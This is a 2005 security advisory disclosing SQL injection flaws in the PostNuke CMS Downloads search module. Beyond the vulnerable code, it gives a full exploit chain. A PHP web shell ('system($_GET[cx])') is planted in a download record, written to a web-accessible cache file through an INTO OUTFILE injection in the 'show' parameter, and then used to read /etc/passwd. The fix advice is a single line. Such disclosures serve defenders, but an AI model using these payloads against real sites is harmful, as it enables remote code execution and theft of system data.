postnukeSQL0760-2.txt

`  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[PostNuke SQL Injection 0.760-RC2=>x cXIb8O3.3]  
  
Author: cXIb8O3(Maksymilian Arciemowicz)  
Date: 20.2.2005  
from securityreason.com TEAM  
  
- --- 0.Description ---  
  
PostNuke: The Phoenix Release (0.750) and (0.760-RC2)  
  
PostNuke is an open source, open developement content management system  
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and  
provides many enhancements and improvements over the PHP-Nuke system. PostNuke  
is still undergoing development but a large number of core functions are now  
stabilising and a complete API for third-party developers is now in place.  
If you would like to help develop this software, please visit our homepage  
at http://noc.postnuke.com/  
You can also visit us on our IRC Server irc.postnuke.com channel  
#postnuke-support  
#postnuke-chat  
#postnuke  
Or at the Community Forums located at:  
http://forums.postnuke.com/  
  
  
- --- 1. Sql Injection ---  
This sql injection exist in modules/Downloads/dl-search.php on line 74 on function search()  
  
Vulnerabilities code:  
- -51-68---  
if ($show!="") {  
$downloadsresults = $show;  
} else {  
$show=$downloadsresults;  
}  
//$query = stripslashes($query);  
$column = &$pntable['downloads_downloads_column'];  
$sql = "SELECT $column[lid], $column[cid], $column[sid],  
$column[title], $column[url], $column[description],  
$column[date], $column[hits], $column[downloadratingsummary],  
$column[totalvotes], $column[totalcomments],  
$column[filesize], $column[version], $column[homepage]  
FROM $pntable[downloads_downloads]  
WHERE $column[title] LIKE '%".pnVarPrepForStore($query)."%'  
OR $column[description] LIKE '%".pnVarPrepForStore($query)."%'  
ORDER BY $pntable[downloads_downloads].$orderby";  
  
$result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min);  
- -51-68---  
  
Error exist in varible $show.  
  
Go to this url to view error:  
  
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3  
  
Error message :  
- ---------------  
Fatal error: Call to a member function PO_RecordCount() on a non-object in /www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74  
- ---------------  
  
Because this sql injection is after ORDER BY.. we can not use UNION etc. But check this exploit.  
  
Exploit   
Check dir for PostNuke.   
  
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3  
  
Error message :  
- ---------------  
Fatal error: Call to a member function PO_RecordCount() on a non-object in /www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line 74  
- ---------------  
  
For exemple prefix is /www/PostNuke-0.760-RC2/html/.   
  
Now add new download and insert to "Description" or "Home page" php code. For example add:  
  
- ---  
<? system($_GET[cx]); ?>  
- ---  
  
And when this download exist in db, go to:  
  
  
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=[Program name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/*  
  
and now for example..  
  
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd  
  
;]  
  
- --- 2. Sql Error ---  
This sql injection exist in modules/Downloads/dl-search.php on line 74 on function search()  
  
Vulnerabilities code:  
- -46-68---  
if(isset($orderby)) {  
$orderby = convertorderbyin($orderby);  
} else {  
$orderby = $pntable['downloads_downloads_column']['title'] . ' ASC';  
}  
if ($show!="") {  
$downloadsresults = $show;  
} else {  
$show=$downloadsresults;  
}  
//$query = stripslashes($query);  
$column = &$pntable['downloads_downloads_column'];  
$sql = "SELECT $column[lid], $column[cid], $column[sid],  
$column[title], $column[url], $column[description],  
$column[date], $column[hits], $column[downloadratingsummary],  
$column[totalvotes], $column[totalcomments],  
$column[filesize], $column[version], $column[homepage]  
FROM $pntable[downloads_downloads]  
WHERE $column[title] LIKE '%".pnVarPrepForStore($query)."%'  
OR $column[description] LIKE '%".pnVarPrepForStore($query)."%'  
ORDER BY $pntable[downloads_downloads].$orderby";  
  
$result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min);  
- -46-68---  
  
Error exist in:  
  
- ---  
$orderby = convertorderbyin($orderby);  
- ---  
  
and sql querty is:  
  
- ---  
SELECT pn_downloads_downloads.pn_lid, pn_downloads_downloads.pn_cid, pn_downloads_downloads.pn_sid, pn_downloads_downloads.pn_title, pn_downloads_downloads.pn_url, pn_downloads_downloads.pn_description, pn_downloads_downloads.pn_date, pn_downloads_downloads.pn_hits, pn_downloads_downloads.pn_ratingsummary, pn_downloads_downloads.pn_totalvotes, pn_downloads_downloads.pn_totalcomments, pn_downloads_downloads.pn_filesize, pn_downloads_downloads.pn_version, pn_downloads_downloads.pn_homepage FROM pn_downloads_downloads WHERE pn_downloads_downloads.pn_title LIKE '%%' OR pn_downloads_downloads.pn_description LIKE '%%' ORDER BY pn_downloads_downloads.  
- ---  
  
Url:  
http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&orderby=  
  
  
- --- 3. How to fix ---  
  
Download the new version of the script or update.  
  
- --- 4. Greets ---  
  
sp3x  
  
and for :(  
  
- --- 5.Contact ---  
Author: Maksymilian Arciemowicz  
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)  
Email: max [at] jestsuper [dot] pl  
GPG-KEY: http://security.jestsuper.pl  
SECURITYREASON.COM TEAM  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.6 (FreeBSD)  
  
iD8DBQFCI32+znmvyJCR4zQRAtXhAKCuLzk7Q1sWCRBemwSOE+hEwFp9uQCfU2I3  
rJzJSh3x+HbJfavy8FKfKYM=  
=Mpoz  
-----END PGP SIGNATURE-----  
`